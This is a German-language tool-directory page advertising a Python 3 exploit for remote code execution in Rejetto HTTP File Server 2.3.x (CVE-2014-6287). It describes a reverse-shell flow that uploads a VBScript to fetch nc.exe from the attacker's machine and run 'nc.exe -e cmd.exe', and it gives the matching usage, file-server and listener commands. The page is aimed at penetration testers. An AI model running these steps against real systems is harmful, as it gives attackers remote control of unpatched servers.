Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Exploit für Remote-Code-Ausführung für Rejetto HTTP File Server 2.3.x (CVE-2014-6287), neu geschrieben in Python 3 für moderne offensive Sicherheitstests. | Kitploit
Tools/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRemote-Access-Tool
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Exploit für Remote-Code-Ausführung für Rejetto HTTP File Server 2.3.x (CVE-2014-6287), neu geschrieben in Python 3 für moderne offensive Sicherheitstests.

Repository anzeigen
2vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

HFS Exploit für Remote-Befehlsausführung (CVE-2014-6287)

Dies ist eine Python-3-Neuimplementierung des klassischen Remote-Befehlsausführungs-Exploits (RCE), der den Rejetto HTTP File Server (HFS) v2.3.x anvisiert und die als CVE-2014-6287 identifizierte Sicherheitslücke ausnutzt.

Ursprünglich entdeckt von Avinash Kumar Thapa aka "-Acid", verbessert diese Version die Portabilität und Benutzerfreundlichkeit durch vollständige Parametrisierung und moderne Kompatibilität.


⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Die unbefugte Nutzung an Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung haben, ist illegal und unethisch.


📌 Exploit-Details

  • Sicherheitslücke: Rejetto HFS v2.3.x - Remote-Befehlsausführung
  • CVE: CVE-2014-6287
  • Auswirkung: Remotecodeausführung mit Systemrechten
  • Voraussetzung: Das Ziel muss eine anfällige Version von HFS mit aktiviertem Scripting ausführen.

🚀 Funktionen

  • Voll kompatibel mit Python 3
  • Akzeptiert alle wichtigen Parameter über die CLI:
  • Ziel-IP und -Port
  • Lokale IP (Angreifer)
  • Listening-Port für Reverse Shell
  • Port zum Hosten von nc.exe
  • Keine festcodierten Werte
  • Klassische nc.exe-Reverse-Shell-Zustellung mittels VBScript
  • Exploit-Ablauf:
    1. Hochladen eines VBScripts zum Herunterladen von nc.exe
    2. Ausführen des VBScripts auf dem Ziel
    3. Ausführen von nc.exe -e cmd.exe zur Herstellung einer Reverse Shell

  • 🛠️ Verwendung

    root@kitploit:~
    python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
    
    Example:
    python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
    
    Requirements:
      - HTTP server serving nc.exe:
          python3 -m http.server 8000
      - Listener:
          nc -lvnp 4444
    
    Tool herunterladen